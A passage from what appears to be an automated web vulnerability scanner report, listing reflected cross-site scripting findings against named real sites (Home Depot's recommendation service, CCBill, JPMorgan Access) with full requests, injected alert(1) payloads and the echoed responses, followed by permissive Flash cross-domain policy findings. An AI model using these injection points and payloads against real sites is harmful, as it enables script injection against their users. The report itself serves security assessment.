Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=r3vcat55x0xldvufmhh0m545; NSC_wjq-ipnfefqpu=ffffffffc3a01e5745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 12 Jul 2011 16:45:10 GMT
Content-Length: 3298

r1eh89fa3<img src=a onerror=alert(1)>512095e9e2b({"Resonance":{"Response":[{"scheme":"search_rr","display":"yes","output":"<div id=\"accessories\"><div id=\"add-ons\" class=\"col\"><div id=\"ymal_vert
...[SNIP]...

3.29. http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload afeb2<img%20src%3da%20onerror%3dalert(1)>543645a44e was submitted in the sc parameter. This input was echoed as afeb2<img src=a onerror=alert(1)>543645a44e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=877035136567428&sg=1&pg=800586763303726&bx=true&vr=2.69&sc=search_rrafeb2<img%20src%3da%20onerror%3dalert(1)>543645a44e&cu=287408220&ct=&no=3&cb=r1eh&clk=&ur=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Search%3Fkeyword%3Dxss%26selectedCatgry%3DSEARCH+ALL%26langId%3D-1%26storeId%3D10051%26catalogId%3D10053&plk=202349120;202571062;202349118;202571024;202571026;202571029;202571027;202571025;202571023;202571028;202349088;202349089;202349087;100661424;&rf=http%3A//www.homedepot.com/ HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=r3vcat55x0xldvufmhh0m545; NSC_wjq-ipnfefqpu=ffffffffc3a01e5745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 12 Jul 2011 16:44:59 GMT
Content-Length: 138

r1eh({"Resonance":{"Response":[{"scheme":"search_rrafeb2<img src=a onerror=alert(1)>543645a44e","display":"no","output":"<div></div>"}]}})

3.30. http://apps.ccbill.com/ [cookieLetterSize cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /

Issue detail

The value of the cookieLetterSize cookie is copied into an HTML comment. The payload a7caa--><script>alert(1)</script>e7b3059ecf4 was submitted in the cookieLetterSize cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.5.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1ema7caa--><script>alert(1)</script>e7b3059ecf4; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 19510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px; font-size: 1ema7caa--><script>alert(1)</script>e7b3059ecf4;">
...[SNIP]...

3.31. http://apps.ccbill.com/ [cookiePageWidth cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /

Issue detail

The value of the cookiePageWidth cookie is copied into an HTML comment. The payload 430a3--><script>alert(1)</script>a94cfc1175f was submitted in the cookiePageWidth cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.5.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px430a3--><script>alert(1)</script>a94cfc1175f; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 19445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px430a3--><script>alert(1)</script>a94cfc1175f; font-size: 1em;">
...[SNIP]...

3.32. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html [cookieLetterSize cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The value of the cookieLetterSize cookie is copied into an HTML comment. The payload e4d2a--><script>alert(1)</script>9c83aba8dd1 was submitted in the cookieLetterSize cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1eme4d2a--><script>alert(1)</script>9c83aba8dd1; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 20488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px; font-size: 1eme4d2a--><script>alert(1)</script>9c83aba8dd1;">
...[SNIP]...

3.33. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html [cookiePageWidth cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The value of the cookiePageWidth cookie is copied into an HTML comment. The payload 7d056--><script>alert(1)</script>975a7e1977 was submitted in the cookiePageWidth cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px7d056--><script>alert(1)</script>975a7e1977; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 20432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px7d056--><script>alert(1)</script>975a7e1977; font-size: 1em;">
...[SNIP]...

3.34. http://apps.ccbill.com/p/developer.html [cookieLetterSize cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /p/developer.html

Issue detail

The value of the cookieLetterSize cookie is copied into an HTML comment. The payload 87721--><script>alert(1)</script>11f81e5e53 was submitted in the cookieLetterSize cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em87721--><script>alert(1)</script>11f81e5e53; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px; font-size: 1em87721--><script>alert(1)</script>11f81e5e53;">
...[SNIP]...

3.35. http://apps.ccbill.com/p/developer.html [cookiePageWidth cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /p/developer.html

Issue detail

The value of the cookiePageWidth cookie is copied into an HTML comment. The payload fc14d--><script>alert(1)</script>c14f5eaa013 was submitted in the cookiePageWidth cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920pxfc14d--><script>alert(1)</script>c14f5eaa013; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920pxfc14d--><script>alert(1)</script>c14f5eaa013; font-size: 1em;">
...[SNIP]...

3.36. http://www.jpmorganaccess.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorganaccess.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0db0"><script>alert(1)</script>671079c1d94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?f0db0"><script>alert(1)</script>671079c1d94=1 HTTP/1.1
Host: www.jpmorganaccess.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 257
Location: https://tssportal.jpmorgan.com/?f0db0"><script>alert(1)</script>671079c1d94=1

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://tssportal.jpmorgan.com/?f0db0"><script>alert(1)</script>671079c1d94=1">
...[SNIP]...

4. Flash cross-domain policy
There are 18 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://1.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 12 Jul 2011 20:47:03 GMT
Expires: Tue, 12 Jul 2011 20:52:03 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://at.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Wed, 13 Jul 2011 02:39:31 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

4.3. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 13 Jul 2011 20:46:59 GMT
Date: Tue, 12 Jul 2011 20:46:59 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.4. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190951000"
Last-Modified: Thu, 15 Jul 2010 10:49:11 GMT
Content-Type: application/xml
Content-Length: 384
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.5. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 12 Jul 2011 20:39:30 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.6. http://metrics.apple.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:59:12 GMT
Server: Omniture DC/2.0.0
xserver: www46
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
